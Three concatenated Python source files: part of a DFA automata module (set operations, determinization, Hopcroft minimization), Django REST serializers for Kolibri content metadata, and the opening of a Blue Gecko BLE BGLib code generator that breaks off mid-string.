Args:
other (DFA): The other DFA that will be used
for the intersect operation
        Returns:
            DFA: The resulting DFA
"""
operation = bool.__and__
self.cross_product(other, operation)
return self
def __and__(self, other):
"""Constructs an unminimized DFA recognizing
the intersection of the languages of two given DFAs.
Args:
other (DFA): The other DFA that will be used
for the intersect operation
Returns:
DFA: The resulting DFA
"""
self.intersect(other)
return self
def symmetric_difference(self, other):
"""Constructs an unminimized DFA recognizing
the symmetric difference of the languages of two given DFAs.
Args:
other (DFA): The other DFA that will be used
for the symmetric difference operation
Returns:
DFA: The resulting DFA
"""
operation = bool.__xor__
self.cross_product(other, operation)
return self
def union(self, other):
"""Constructs an unminimized DFA recognizing the union of the languages of two given DFAs.
Args:
other (DFA): The other DFA that will be used
for the union operation
Returns:
DFA: The resulting DFA
"""
operation = bool.__or__
self.cross_product(other, operation)
return self
def __or__(self, other):
"""Constructs an unminimized DFA recognizing the union of the languages of two given DFAs.
Args:
other (DFA): The other DFA that will be used
for the union operation
Returns:
DFA: The resulting DFA
"""
self.union(other)
return self
def _epsilon_closure(self, state):
"""
        Returns the epsilon-closure for the state given as input.
"""
closure = set([state.stateid])
stack = [state]
while True:
if not stack:
break
s = stack.pop()
for arc in s:
if self.isyms.find(arc.ilabel) != EPSILON or \
arc.nextstate in closure:
continue
closure.add(arc.nextstate)
stack.append(self.states[arc.nextstate])
return closure
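    # Example (hedged): with EPSILON arcs 0 -> 1 and 1 -> 2, the closure of
    # state 0 is {0, 1, 2}; arcs labelled with ordinary symbols are ignored
    # by this walk.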
def determinize(self):
"""
        Transforms a non-deterministic automaton into a deterministic one.
Args:
None
Returns:
DFA: The resulting DFA
Creating an equivalent DFA is done using the standard algorithm.
A nice description can be found in the book:
Harry R. Lewis and Christos H. Papadimitriou. 1998.
        Elements of the Theory of Computation.
"""
# Compute the \epsilon-closure for all states and save it in a diagram
epsilon_closure = {}
for state in self.states:
sid = state.stateid
epsilon_closure[sid] = self._epsilon_closure(state)
# Get a transition diagram to speed up computations
trans_table = {}
for state in self.states:
trans_table[state.stateid] = defaultdict(set)
for arc in state:
char = self.isyms.find(arc.ilabel)
trans_table[state.stateid][char].add(arc.nextstate)
# is_final function:
# Given a set of nfa states representing a dfa_state return 1 if the
# corresponding DFA state is a final state, i.e. if any of the
# corresponding NFA states are final.
        is_final = lambda nfa_states, dfa_state: \
            any(nfa_states[x].final for x in dfa_state)
# Precomputation is over, start executing the conversion algorithm
state_idx = 1
nfa_states = copy.deepcopy(self.states)
self.states = []
# Initialize the new DFA state list
self.add_state()
new_initial = epsilon_closure[nfa_states[0].stateid]
self.states[0].final = is_final(nfa_states, new_initial)
dfa_state_idx_map = { frozenset(new_initial) : 0 }
stack = [new_initial]
while True:
# Iterate until all added DFA states are processed.
if not stack:
break
# This is a set of states from the NFA
src_dfa_state = stack.pop()
src_dfa_state_idx = dfa_state_idx_map[frozenset(src_dfa_state)]
for char in self.alphabet:
# Compute the set of target states
target_dfa_state = set([])
for nfa_state in src_dfa_state:
next_states = \
set([y for x in trans_table[nfa_state][char] \
for y in epsilon_closure[x] ])
target_dfa_state.update(next_states)
# If the computed state set is not part of our new DFA add it,
# along with the transition for the current character.
if frozenset(target_dfa_state) not in dfa_state_idx_map:
self.add_state()
dfa_state_idx_map[frozenset(target_dfa_state)] = state_idx
self.states[state_idx].final = is_final(nfa_states,
target_dfa_state)
state_idx += 1
stack.append(target_dfa_state)
dst_state_idx = dfa_state_idx_map[frozenset(target_dfa_state)]
self.add_arc(src_dfa_state_idx, dst_state_idx, char)
return self
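    # Example (hedged): an NFA with an EPSILON arc 0 -> 1 where state 1 is
    # final determinizes to a DFA whose new initial state represents the
    # closure {0, 1} and is therefore itself final.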
def invert(self):
"""Inverts the DFA final states"""
for state in self.states:
if state.final:
state.final = False
else:
state.final = True
def difference(self, other):
"""Performs the Diff operation between two atomata
Args:
other (DFA): The other DFA that will be used
for the difference operation
Returns:
DFA: The resulting DFA
"""
other.invert()
self.intersect(other)
return self
def __sub__(self, other):
"""Performs the Diff operation between two atomata
Args:
other (DFA): The other DFA that will be used
for the difference operation
Returns:
DFA: The resulting DFA
"""
self.difference(other)
return self
def hopcroft(self):
"""
Performs the Hopcroft minimization algorithm
Args:
None
Returns:
DFA: The minimized input DFA
"""
def _getset(testset, partition):
"""
Checks if a set is in a partition
Args:
testset (set): The examined set
partition (list): A list of sets
Returns:
bool: A value indicating if it is a member or not
"""
for part in partition:
if set(testset) == set(part):
return True
return None
def _create_transitions_representation(graph):
"""
In order to speedup the transition iteration using
the alphabet, the function creates an index
            Args:
                graph (DFA): The input dfa
Returns:
dict: The generated transition map
"""
return {x.stateid:{self.isyms.find(arc.ilabel): arc.nextstate \
for arc in x} for x in graph.states}
def _create_reverse_transitions_representation(graph):
"""
In order to speedup the transition iteration using
the alphabet, the function creates an index
            Args:
                graph (DFA): The input dfa
Returns:
dict: The generated transition map
"""
return {x.stateid: {self.isyms.find(arc.ilabel): arc.nextstate \
for arc in x} for x in graph.states}
def _reverse_to_source(target, group1):
"""
Args:
target (dict): A table containing the reverse transitions for each state
group1 (list): A group of states
Return:
                Set: The set of states that have a transition into the states of the group
"""
new_group = []
for dst in group1:
new_group += target[dst]
return set(new_group)
def _get_group_from_state(groups, sid):
"""
            Args:
                groups (list): The list of state groups
                sid (int): The state identifier
Return:
int: The group identifier that the state belongs
"""
for index, selectgroup in enumerate(groups):
if sid in selectgroup:
return index
def _delta(graph, cur_state, char):
"""
Function describing the transitions
Args:
graph (DFA): The DFA states
cur_state (DFA state): The DFA current state
                char (str): The char that will be used for the transition
Return:
DFA Node: The next state
"""
for arc in cur_state.arcs:
if graph.isyms.find(arc.ilabel) == char:
return graph[arc.nextstate]
def _partition_group(bookeeping, group):
"""
            Args:
                bookeeping (list): The list of (group1, group2) splits recorded so far
                group (list): A group of states
Return:
tuple: A set of two groups
"""
for (group1, group2) in bookeeping:
if group & group1 != set() and not group.issubset(group1):
new_g1 = group & group1
new_g2 = group - group1
return (new_g1, new_g2)
if group & group2 != set() and not group.issubset(group2):
new_g1 = group & group2
new_g2 = group - group2
return (new_g1, new_g2)
assert False, "Unmatched group partition"
def _object_set_to_state_list(objectset):
"""
Args:
objectset (list): A list of all the DFA states (as objects)
Return:
list: A list of all the DFA states (as identifiers)
"""
return [state.stateid for state in objectset]
def _get_accepted(graph):
"""
Find the accepted states
Args:
graph (DFA): The DFA states
Return:
list: Returns the list of the accepted states
"""
return [state for state in graph \
if state.final != TropicalWeight(float('inf'))]
graph = self
# Find Q
set_q = set(_object_set_to_state_list(graph.states))
# We will work with states addresses here instead of states stateid for
# more convenience
set_f = set(_object_set_to_state_list(_get_accepted(graph)))
# Perform P := {F, Q-F}
set_nf = set_q.copy() - set_f.copy()
groups = [set_f.copy(), set_nf.copy()]
bookeeping = [(set_f, set_nf)]
done = False
while not done:
done = True
new_groups = []
for selectgroup in groups:
# _check for each letter if it splits the current group
for character in self.alphabet:
# print 'Testing symbol: ', c
target = defaultdict(list)
target_states = defaultdict(int)
new_g = [set(selectgroup)]
for sid in selectgroup:
# _check if all transitions using c are going in a state
# in the same group. If they are going on a different
# group then split
deststate = _delta(graph, graph[sid], character)
destgroup = _get_group_from_state(groups,
deststate.stateid)
target[destgroup].append(sid)
target_states[destgroup] = deststate.stateid
if len(target) > 1:
inv_target_states = {
v: k for k, v in target_states.iteritems()}
new_g = [set(selectedstate) for selectedstate in target.values()]
done = False
# Get all the partitions of destgroups
queue = [set([x for x in target_states.values()])]
while queue:
top = queue.pop(0)
(group1, group2) = _partition_group(bookeeping, top)
ng1 = _reverse_to_source(
target, [inv_target_states[x] for x in group1])
ng2 = _reverse_to_source(
target, [inv_target_states[x] for x in group2])
bookeeping.append((ng1, ng2))
if len(group1) > 1:
queue.append(group1)
if len(group2) > 1:
queue.append(group2)
break
new_groups += new_g
# End of iteration for the k-equivalence
# Assign new groups and check if any change occured
groups = new_groups
# Make a copy of the old states, and prepare the
# automaton to host the minimum states
oldstates = copy.deepcopy(self.states)
self.states = []
self.define()
def findpart(stateid, partitions):
"""Searches for the groupt that the state identifier
belongs to.
Args:
stateid (int): The state identifier
partitions (list): The list of the groups
Returns:
set: The group that the stateid belongs to.
"""
for group in partitions:
if stateid in group:
return frozenset(group)
            return frozenset()
def add_state_if_not_exists(group, statesmap, final):
"""
            Adds a new state in the final dfa. It initially checks if
            the group of states is already registered to the automaton.
            If it is registered, the existing state identifier is
            returned; otherwise a new state is added.
Args:
group (frozenset): The group that the state identifier belongs
                statesmap (dict): A dictionary that maintains the state
                    identifiers for each frozenset
final (bool): A value indicating if the current state is
final
Returns:
int: The new state identifier
"""
if group not in statesmap:
sid = self.add_state()
self[sid].final = final
statesmap[group] = sid
return statesmap[group]
statesmap = {}
self.states = []
group = findpart(0, groups)
sid = add_state_if_not_exists(frozenset(list(group)), statesmap,
oldstates[0].final)
self[sid].initial = True
for group in groups:
if len(group) == 0:
continue
sid = add_state_if_not_exists(frozenset(group), statesmap,
oldstates[list(group)[0]].final)
state = next(iter(group))
for arc in oldstates[state]:
dst_group = findpart(arc.nextstate, groups)
dst_sid = add_state_if_not_exists(
dst_group, statesmap, oldstates[arc.nextstate].final)
self.add_arc(sid, dst_sid, graph.isyms.find(arc.ilabel))
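    # Summary (descriptive only): hopcroft() starts from the partition
    # {final, non-final}, repeatedly splits any group whose members disagree
    # on the group reached for some input character, and finally rebuilds
    # self.states with one state per surviving group.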
def cross_product(self, dfa_2, accept_method):
"""A generalized cross-product constructor over two DFAs.
        The accept_method argument is a binary boolean function f; a state (q1, q2) in the
        final DFA accepts if f(A[q1], A[q2]), where A indicates the acceptance-value of the state.
Args:
dfa_2: The second dfa
accept_method: The boolean action
Returns:
None
"""
dfa_1states = copy.deepcopy(self.states)
dfa_2states = dfa_2.states
self.states = []
states = {}
def _create_transitions_representation(graph, state):
"""
In order to speedup the transition iteration using
the alphabet, the function creates an index
Args:
graph (DFA): The input dfa
state (DFA state): The examined state
Returns:
dict: The generated transition map
"""
return {self.isyms.find(arc.ilabel): graph[arc.nextstate] for arc in state}
def _add_state_if_nonexistent(state_a, state_b):
"""
Adds a new state in the final dfa, which is the
combination of the input states. The initial and final
flag is also placed on the new state. If the state already
exists, its identifier is being returned.
Args:
state_a: The fist state identifier
state_b: The second state identifier
Returns:
int: The new state identifier
"""
if (state_a.stateid, state_b.stateid) not in states:
states[(state_a.stateid, state_b.stateid)] \
= self.add_state()
self[states[(state_a.stateid, state_b.stateid)]].initial \
= state_a.initial and state_b.initial
self[states[(state_a.stateid, state_b.stateid)]].final \
= accept_method(state_a.final, state_b.final)
return states[(state_a.stateid, state_b.stateid)]
for state1, state2 in product(dfa_1states, dfa_2states):
sid1 = _add_state_if_nonexistent(state1, state2)
transitions_s1 = _create_transitions_representation(dfa_1states, state1)
transitions_s2 = _create_transitions_representation(dfa_2states, state2)
for char in self.alphabet:
sid2 = _add_state_if_nonexistent(
transitions_s1[char], transitions_s2[char])
self.add_arc(sid1, sid2, char)
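# A minimal, hedged usage sketch for this module (hypothetical demo, not part of
# the original file): build a two-state DFA over {'a', 'b'} that accepts strings
# ending in 'b', then consume some input.
if __name__ == '__main__':
    demo = PythonDFA(alphabet=['a', 'b'])
    demo.add_arc(0, 0, 'a')  # states are created on demand by add_arc
    demo.add_arc(0, 1, 'b')
    demo.add_arc(1, 0, 'a')
    demo.add_arc(1, 1, 'b')
    demo[0].initial = True
    demo[1].final = True
    print demo.consume_input('ab')  # True: ends in 'b'
    print demo.consume_input('ba')  # False: ends in 'a'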
|
|
from le_utils.constants import content_kinds
from rest_framework import serializers
from kolibri.core.content.models import ChannelMetadata
from kolibri.core.content.models import ContentNode
from kolibri.core.content.models import File
from kolibri.core.content.models import Language
from kolibri.core.fields import create_timezonestamp
class DynamicFieldsModelSerializer(serializers.ModelSerializer):
def __init__(self, *args, **kwargs):
# Instantiate the superclass normally
super(DynamicFieldsModelSerializer, self).__init__(*args, **kwargs)
# enable dynamic fields specification!
if "request" in self.context and self.context["request"].GET.get(
"fields", None
):
fields = self.context["request"].GET["fields"].split(",")
# Drop any fields that are not specified in the `fields` argument.
allowed = set(fields)
existing = set(self.fields.keys())
for field_name in existing - allowed:
self.fields.pop(field_name)
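# Example (hedged): a request such as GET /api/endpoint?fields=id,name makes the
# serializer above drop every declared field except "id" and "name"; without the
# "fields" query parameter the full field set is returned.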
class ChannelMetadataSerializer(serializers.ModelSerializer):
root = serializers.PrimaryKeyRelatedField(read_only=True)
lang_code = serializers.SerializerMethodField()
lang_name = serializers.SerializerMethodField()
available = serializers.SerializerMethodField()
num_coach_contents = serializers.IntegerField(source="root.num_coach_contents")
def get_lang_code(self, instance):
if instance.root.lang is None:
return None
return instance.root.lang.lang_code
def get_lang_name(self, instance):
if instance.root.lang is None:
return None
return instance.root.lang.lang_name
def get_available(self, instance):
return instance.root.available
class Meta:
model = ChannelMetadata
fields = (
"author",
"description",
"tagline",
"id",
"last_updated",
"lang_code",
"lang_name",
"name",
"root",
"thumbnail",
"version",
"available",
"num_coach_contents",
"public",
)
class PublicChannelSerializer(serializers.ModelSerializer):
included_languages = serializers.SerializerMethodField()
matching_tokens = serializers.SerializerMethodField("match_tokens")
language = serializers.SerializerMethodField()
icon_encoding = serializers.SerializerMethodField()
last_published = serializers.SerializerMethodField()
def get_language(self, instance):
if instance.root.lang is None:
return None
return instance.root.lang.lang_code
def get_icon_encoding(self, instance):
return instance.thumbnail
def get_included_languages(self, instance):
return list(instance.included_languages.all().values_list("id", flat=True))
def get_last_published(self, instance):
return (
None
if not instance.last_updated
else create_timezonestamp(instance.last_updated)
)
def match_tokens(self, channel):
return []
class Meta:
model = ChannelMetadata
fields = (
"id",
"name",
"language",
"included_languages",
"description",
"tagline",
"total_resource_count",
"version",
"published_size",
"last_published",
"icon_encoding",
"matching_tokens",
"public",
)
class LowerCaseField(serializers.CharField):
def to_representation(self, obj):
return super(LowerCaseField, self).to_representation(obj).lower()
class LanguageSerializer(serializers.ModelSerializer):
id = LowerCaseField(max_length=14)
lang_code = LowerCaseField(max_length=3)
lang_subcode = LowerCaseField(max_length=10)
class Meta:
model = Language
fields = ("id", "lang_code", "lang_subcode", "lang_name", "lang_direction")
class FileSerializer(serializers.ModelSerializer):
checksum = serializers.CharField(source="local_file_id")
storage_url = serializers.SerializerMethodField()
extension = serializers.SerializerMethodField()
file_size = serializers.SerializerMethodField()
lang = LanguageSerializer()
available = serializers.BooleanField(source="local_file.available")
def get_storage_url(self, target_node):
return target_node.get_storage_url()
def get_extension(self, target_node):
return target_node.get_extension()
def get_file_size(self, target_node):
return target_node.get_file_size()
class Meta:
model = File
fields = (
"storage_url",
"id",
"priority",
"available",
"file_size",
"extension",
"checksum",
"preset",
"lang",
"supplementary",
"thumbnail",
)
class ContentNodeGranularSerializer(serializers.ModelSerializer):
num_coach_contents = serializers.SerializerMethodField()
coach_content = serializers.SerializerMethodField()
total_resources = serializers.SerializerMethodField()
importable = serializers.SerializerMethodField()
new_resource = serializers.SerializerMethodField()
num_new_resources = serializers.SerializerMethodField()
updated_resource = serializers.SerializerMethodField()
is_leaf = serializers.SerializerMethodField()
class Meta:
model = ContentNode
fields = (
"id",
"available",
"coach_content",
"importable",
"is_leaf",
"kind",
"num_coach_contents",
"on_device_resources",
"title",
"total_resources",
"new_resource",
"num_new_resources",
"updated_resource",
)
@property
def channel_stats(self):
return self.context["channel_stats"]
def get_total_resources(self, instance):
# channel_stats is None for export
if self.channel_stats is None:
return instance.on_device_resources
return self.channel_stats.get(instance.id, {"total_resources": 0})[
"total_resources"
]
def get_num_coach_contents(self, instance):
# If for exporting, only show what is available on server. For importing,
# show all of the coach contents in the topic.
if self.channel_stats is None:
return instance.num_coach_contents
return self.channel_stats.get(instance.id, {"num_coach_contents": 0})[
"num_coach_contents"
]
def get_coach_content(self, instance):
# If for exporting, only show what is on server. For importing,
# show all of the coach contents in the topic.
if self.channel_stats is None:
return instance.coach_content
return self.channel_stats.get(instance.id, {"coach_content": False})[
"coach_content"
]
def get_importable(self, instance):
# If for export, just return None
if self.channel_stats is None:
return None
return instance.id in self.channel_stats
def get_new_resource(self, instance):
# If for export, just return None
if self.channel_stats is None:
return None
return self.channel_stats.get(instance.id, {}).get("new_resource", False)
def get_num_new_resources(self, instance):
# If for export, just return None
if self.channel_stats is None:
return None
return self.channel_stats.get(instance.id, {}).get("num_new_resources", 0)
def get_updated_resource(self, instance):
# If for export, just return None
if self.channel_stats is None:
return None
return self.channel_stats.get(instance.id, {}).get("updated_resource", False)
def get_is_leaf(self, instance):
return instance.kind != content_kinds.TOPIC
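# A hedged usage sketch (hypothetical, not part of this module): the granular
# serializer reads "channel_stats" from its context, and a None value switches
# it into export mode, falling back to the counts stored on the node itself.
#
#     node = ContentNode.objects.first()
#     data = ContentNodeGranularSerializer(
#         node, context={"channel_stats": None}
#     ).data
#     data["importable"]  # None in export mode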
|
|
# ================================================================
# Blue Gecko BLE API BGLib code generator: Python3 platform
# Jeff Rowberg <jeff@rowberg.net>
# Kris Young <kris.young@silabs.com>
# ----------------------------------------------------------------
#
# CHANGELOG:
# 2020-08-03 - Ported to Blue Gecko (Kris Young)
# 2017-06-26 - Moved to python3
# 2013-05-04 - Fixed single-item struct.unpack returns (@zwasson on Github)
# 2013-04-28 - Fixed numerous uint8array/bd_addr command arg errors
# - Added 'debug' support
# 2013-04-16 - Fixed 'bglib_on_idle' to be 'on_idle'
# 2013-04-15 - Added wifi BGAPI support in addition to BLE BGAPI
# - Fixed references to 'this' instead of 'self'
# 2013-04-11 - Initial release
#
# ================================================================
# Refer to LICENSE.md in the project repo for license details.
from xml.dom.minidom import parseString
from datetime import datetime
# open, read, and close the BLEAPI XML data
print("Reading gecko.xml...")
file = open('gecko.xml', 'r')
data = file.read()
file.close()
# parse XML into a DOM structure
print("Parsing BLE API definition...")
dom = parseString(data)
# read relevant dom nodes for highlighter generation
ble_datatypes = dom.getElementsByTagName('datatype')
ble_classes = dom.getElementsByTagName('class')
#for ble_datatype in ble_datatypes:
# print(ble_datatype.toxml())
ble_command_method_definitions = []
ble_response_callback_definitions = []
ble_response_callback_parser_conditions = []
ble_event_callback_definitions = []
ble_event_callback_parser_conditions = []
ble_constant_macros = []
for ble_class in ble_classes:
class_name = ble_class.attributes['name'].value
print("Gathering command, event, and enum data from main class '" + class_name + "'...")
if len(ble_response_callback_parser_conditions) > 0:
ble_response_callback_parser_conditions.append('elif packet_class == ' + ble_class.attributes['index'].value + ':')
else:
ble_response_callback_parser_conditions.append('if packet_class == ' + ble_class.attributes['index'].value + ':')
num_responses = 0
for ble_command in ble_class.getElementsByTagName('command'):
#print(class_name + '_' + ble_command.attributes['name'].value)
ble_command_name = class_name + '_' + ble_command.attributes['name'].value
# gather parameter info, if present
        ble_params = ble_command.getElementsByTagName('params')
parameters = ['self'] # python class methods require this
payload_length = 0
payload_additional = ''
payload_parameters = []
pack_pattern = '<4B'
pack_args = ['0x20', '0', ble_class.attributes['index'].value, ble_command.attributes['index'].value]
if len(ble_params) > 0:
for ble_param in ble_params[0].getElementsByTagName('param'):
parameters.append('' + ble_param.attributes['name'].value)
if ble_param.attributes['type'].value == 'uint8':
pack_args.append('' + ble_param.attributes['name'].value)
pack_pattern += 'B'
payload_length += 1
elif ble_param.attributes['type'].value == 'int8':
pack_args.append('' + ble_param.attributes['name'].value)
pack_pattern += 'b'
payload_length += 1
elif ble_param.attributes['type'].value == 'uint16':
pack_args.append('' + ble_param.attributes['name'].value)
pack_pattern += 'H'
payload_length += 2
elif ble_param.attributes['type'].value == 'int16':
pack_args.append('' + ble_param.attributes['name'].value)
pack_pattern += 'h'
payload_length += 2
elif ble_param.attributes['type'].value == 'uint32':
pack_args.append('' + ble_param.attributes['name'].value)
pack_pattern += 'I'
payload_length += 4
elif ble_param.attributes['type'].value == 'bd_addr':
pack_args.append('' + 'bytes(i for i in ' + ble_param.attributes['name'].value + ')')
pack_pattern += '6s'
payload_length += 6
elif ble_param.attributes['type'].value == 'uint8array':
pack_args.append('len(' + ble_param.attributes['name'].value + ')')
pack_args.append('' + 'bytes(i for i in ' + ble_param.attributes['name'].value + ')')
pack_pattern += 'B\' + str(len(' + ble_param.attributes['name'].value + ')) + \'s'
payload_length += 1
payload_additional += ' + len(' + ble_param.attributes['name'].value + ')'
pack_args[1] = str(payload_length)
if len(payload_additional) > 0: pack_args[1] += payload_additional
ble_command_method_definitions.append('def gecko_cmd_' + ble_command_name + '(' + ', '.join(parameters) + '):')
ble_command_method_definitions.append(' return struct.pack(\'' + pack_pattern + '\', ' + ', '.join(pack_args) + ')')
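        # For illustration (hedged; real names and indices depend on gecko.xml):
        # a command with a single uint16 parameter generates something like
        #     def gecko_cmd_example_set(self, value):
        #         return struct.pack('<4BH', 0x20, 2, <class>, <cmd>, value)
        # where header byte 1 carries the payload length (2 for one uint16).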
# gather return value info, if present
        ble_returns = ble_command.getElementsByTagName('returns')
returns = []
if len(ble_returns) > 0:
for ble_return in ble_returns[0].getElementsByTagName('param'):
returns.append(ble_return.attributes['type'].value + ' ' + ble_return.attributes['name'].value)
ble_response_args = []
obj_args = []
unpack_pattern = '<'
unpack_args = []
payload_length = 0
additional_code = []
if len(ble_returns) > 0:
for ble_return in ble_returns[0].getElementsByTagName('param'):
if (ble_return.attributes['type'].value == 'uint8'):
unpack_pattern += 'B'
unpack_args.append(ble_return.attributes['name'].value)
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value)
payload_length += 1
elif (ble_return.attributes['type'].value == 'uint16'):
unpack_pattern += 'H'
unpack_args.append(ble_return.attributes['name'].value)
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value)
payload_length += 2
elif (ble_return.attributes['type'].value == 'uint32'):
unpack_pattern += 'I'
unpack_args.append(ble_return.attributes['name'].value)
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value)
payload_length += 4
elif (ble_return.attributes['type'].value == 'int8'):
unpack_pattern += 'b'
unpack_args.append(ble_return.attributes['name'].value)
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value)
payload_length += 1
elif (ble_return.attributes['type'].value == 'int16'):
unpack_pattern += 'h'
unpack_args.append(ble_return.attributes['name'].value)
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value)
payload_length += 2
elif (ble_return.attributes['type'].value == 'int32'):
unpack_pattern += 'i'
unpack_args.append(ble_return.attributes['name'].value)
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value)
payload_length += 4
elif (ble_return.attributes['type'].value == 'bd_addr'):
unpack_pattern += '6s'
unpack_args.append(ble_return.attributes['name'].value)
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value)
payload_length += 6
additional_code.append(ble_return.attributes['name'].value + ' = ' + ble_return.attributes['name'].value)
elif (ble_return.attributes['type'].value == 'uint8array'):
unpack_pattern += 'B'
unpack_args.append(ble_return.attributes['name'].value + '_len')
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value + '_data')
payload_length += 1
additional_code.append(ble_return.attributes['name'].value + '_data = self.bgapi_rx_payload[' + str(payload_length) + ':]')
if num_responses > 0:
ble_response_callback_parser_conditions.append(' elif packet_command == %s: # gecko_rsp_%s' % (ble_command.attributes['index'].value, ble_command_name))
else:
ble_response_callback_parser_conditions.append(' if packet_command == %s: # gecko_rsp_%s' % (ble_command.attributes['index'].value, ble_command_name))
ble_response_code = []
if payload_length > 0:
if len(unpack_args) > 1:
ble_response_code.append(', '.join(unpack_args) + ' = struct.unpack(\'' + unpack_pattern + '\', self.bgapi_rx_payload[:' + str(payload_length) + '])')
else:
# "struct.unpack" returns a tuple no matter what
# (thanks @zwasson: https://github.com/jrowberg/bglib/issues/5)
ble_response_code.append(', '.join(unpack_args) + ' = struct.unpack(\'' + unpack_pattern + '\', self.bgapi_rx_payload[:' + str(payload_length) + '])[0]')
            ble_response_code.extend(additional_code)
ble_response_code.append('self.gecko_rsp_' + ble_command_name + '({ ' + ', '.join(obj_args) + ' })')
ble_response_callback_parser_conditions.append(' ' + '\n '.join(ble_response_code))
if ble_class.attributes['index'].value == '0' and ble_command.attributes['index'].value == '0':
ble_response_callback_parser_conditions.append(' self.busy = False')
ble_response_callback_parser_conditions.append(' self.on_idle()')
ble_response_callback_definitions.append('gecko_rsp_' + ble_command_name + ' = BGAPIEvent()')
num_responses += 1
if num_responses == 0:
ble_response_callback_parser_conditions.pop()
if len(ble_event_callback_parser_conditions) > 0:
ble_event_callback_parser_conditions.append('elif packet_class == ' + ble_class.attributes['index'].value + ':')
else:
ble_event_callback_parser_conditions.append('if packet_class == ' + ble_class.attributes['index'].value + ':')
num_events = 0
for ble_event in ble_class.getElementsByTagName('event'):
#print(class_name + '_' + ble_event.attributes['name'].value)
ble_event_name = class_name + '_' + ble_event.attributes['name'].value
# gather parameter info, if present
        ble_params = ble_event.getElementsByTagName('params')
obj_args = []
unpack_pattern = '<'
unpack_args = []
payload_length = 0
additional_code = []
if len(ble_params) > 0:
for ble_param in ble_params[0].getElementsByTagName('param'):
if (ble_param.attributes['type'].value == 'uint8'):
unpack_pattern += 'B'
unpack_args.append(ble_param.attributes['name'].value)
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value)
payload_length += 1
elif (ble_param.attributes['type'].value == 'uint16'):
unpack_pattern += 'H'
unpack_args.append(ble_param.attributes['name'].value)
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value)
payload_length += 2
elif (ble_param.attributes['type'].value == 'uint32'):
unpack_pattern += 'I'
unpack_args.append(ble_param.attributes['name'].value)
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value)
payload_length += 4
elif (ble_param.attributes['type'].value == 'int8'):
unpack_pattern += 'b'
unpack_args.append(ble_param.attributes['name'].value)
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value)
payload_length += 1
elif (ble_param.attributes['type'].value == 'int16'):
unpack_pattern += 'h'
unpack_args.append(ble_param.attributes['name'].value)
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value)
payload_length += 2
elif (ble_param.attributes['type'].value == 'int32'):
unpack_pattern += 'i'
unpack_args.append(ble_param.attributes['name'].value)
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value)
payload_length += 4
elif (ble_param.attributes['type'].value == 'bd_addr'):
unpack_pattern += '6s'
unpack_args.append(ble_param.attributes['name'].value)
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value)
payload_length += 6
additional_code.append(ble_param.attributes['name'].value + ' = ' + ble_param.attributes['name'].value)
elif (ble_param.attributes['type'].value == 'uint8array'):
unpack_pattern += 'B'
unpack_args.append(ble_param.attributes['name'].value + '_len')
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value + '_data')
payload_length += 1
additional_code.append(ble_param.attributes['name'].value + '_data = self.bgapi_rx_payload[' + str(payload_length) + ':]')
if num_events > 0:
ble_event_callback_parser_conditions.append(' elif packet_command == %s: # gecko_evt_%s' % (ble_event.attributes['index'].value, ble_event_name))
else:
ble_event_callback_parser_conditions.append(' if packet_command == %s: # gecko_evt_%s' % (ble_event.attributes['index'].value, ble_event_name))
ble_event_code = []
if payload_length > 0:
if len(unpack_args) > 1:
ble_event_code.append(', '.join(unpack_args) + ' = struct.unpack(\'' + unpack_pattern + '\', self.bgapi_rx_payload[:' + str(payload_length) + '])')
else:
# "struct.unpack" returns a tuple no matter what
# (thanks @zwasson: https://github.com/jrowberg/bglib/issues/5)
ble_event_code.append(', '.join(unpack_args) + ' = struct.unpack(\'' + unpack_pattern + '\', self.bgapi_rx_payload[:' + str(payload_length) + '])[0]')
            ble_event_code.extend(additional_code)
ble_event_code.append('self.gecko_evt_' + ble_event_name + '({ ' + ', '.join(obj_args) + ' })')
ble_event_callback_parser_conditions.append(' ' + '\n '.join(ble_event_code))
if ble_class.attributes['index'].value == '0' and ble_event.attributes['index'].value == '0':
ble_event_callback_parser_conditions.append(' self.busy = False')
ble_event_callback_parser_conditions.append(' self.on_idle()')
ble_event_callback_definitions.append('gecko_evt_' + ble_event_name + ' = BGAPIEvent()')
num_events += 1
if num_events == 0:
ble_event_callback_parser_conditions.pop()
for ble_enum in ble_class.getElementsByTagName('enum'):
#print(class_name + '_' + ble_enum.attributes['name'].value)
enum_name = class_name + '_' + ble_enum.attributes['name'].value
ble_constant_macros.append('#define BGLIB_' + (enum_name.upper() + ' ').ljust(54) + ble_enum.attributes['value'].value)
if len(ble_constant_macros) > 0 and ble_constant_macros[len(ble_constant_macros) - 1] != '':
ble_constant_macros.append('')
# create Python library file(s)
print("Writing Python source library files...")
source = open('bglib.py', 'w')
source.write('#!/usr/bin/env python\n\
\n\
""" Blue Gecko BGAPI/BGLib implementation\n\
\n\
Changelog:\n\
2020-08-03 - Ported to Blue Gecko v2.x API (Kris Young)\n\
2017-06-26 - Moved to python3\n\
2013-05-04 - Fixed single-item struct.unpack returns (@zwasson on Github)\n\
2013-04-28 - Fixed numerous uint8array/bd_addr command arg errors\n\
- Added \'debug\' support\n\
2013-04-16 - Fixed \'bglib_on_idle\' to be \'on_idle\'\n\
2013-04-15 - Added wifi BGAPI support in addition to BLE BGAPI\n\
- Fixed references to \'this\' instead of \'self\'\n\
2013-04-11 - Initial release\n\
\n\
============================================\n\
Blue Gecko BGLib Python interface library\n\
2013-05-04 by Jeff Rowberg <jeff@rowberg.net>\n\
Updates should (hopefully) always be available at https://github.com/jrowberg/bglib\n\
\n\
============================================\n\
